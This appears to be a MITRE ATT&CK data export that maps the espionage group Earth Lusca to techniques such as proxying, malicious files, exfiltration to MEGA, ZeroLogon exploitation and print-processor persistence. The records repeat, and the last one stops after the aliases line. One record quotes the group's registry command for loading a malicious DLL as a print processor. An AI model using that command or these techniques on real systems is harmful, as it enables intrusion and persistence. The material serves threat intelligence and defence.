type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) adopted Cloudflare as a proxy for compromised servers.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--bee75401-9e24-4c5d-9203-0b3cdca01cbf
revoked : False
technique : Proxy
technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.

Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1090
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used VBA scripts.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--245ced0a-5a53-44bd-a4db-07451f752b14
revoked : False
technique : Visual Basic
technique_description : Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)

Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)

Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.005
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux']
data_sources : ['Module: Module Load', 'Command: Command Execution', 'Process: Process Creation', 'Script: Script Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) required users to click on a malicious file for the loader to activate.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--b71bc667-b3e8-4482-ba74-118049872be4
revoked : False
technique : Malicious File
technique_description : An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) 

While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1204.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'File: File Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a44ba3c3-406a-49cf-9d7b-9ee7f09f9ae4
revoked : False
technique : Exfiltration to Cloud Storage
technique_description : Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='exfiltration')]
technique_id : T1567.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'File: File Access', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Mimikatz](https://attack.mitre.org/software/S0002) to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--495db551-b69c-482e-b242-831011c054f7
revoked : False
technique : Exploitation of Remote Services
technique_description : Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)

Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1210
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6a779cbf-ef5c-4018-a91f-10889b2068b0
revoked : False
technique : Print Processors
technique_description : Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver</code> Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020)

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1547.012
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'File: File Creation', 'Driver: Driver Load', 'Module: Module Load', 'Process: OS API Execution']
permissions_required : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used PowerShell to execute commands.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6e2b1acc-87b5-4947-a933-b376d48b126a
revoked : False
technique : PowerShell
technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363),  [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
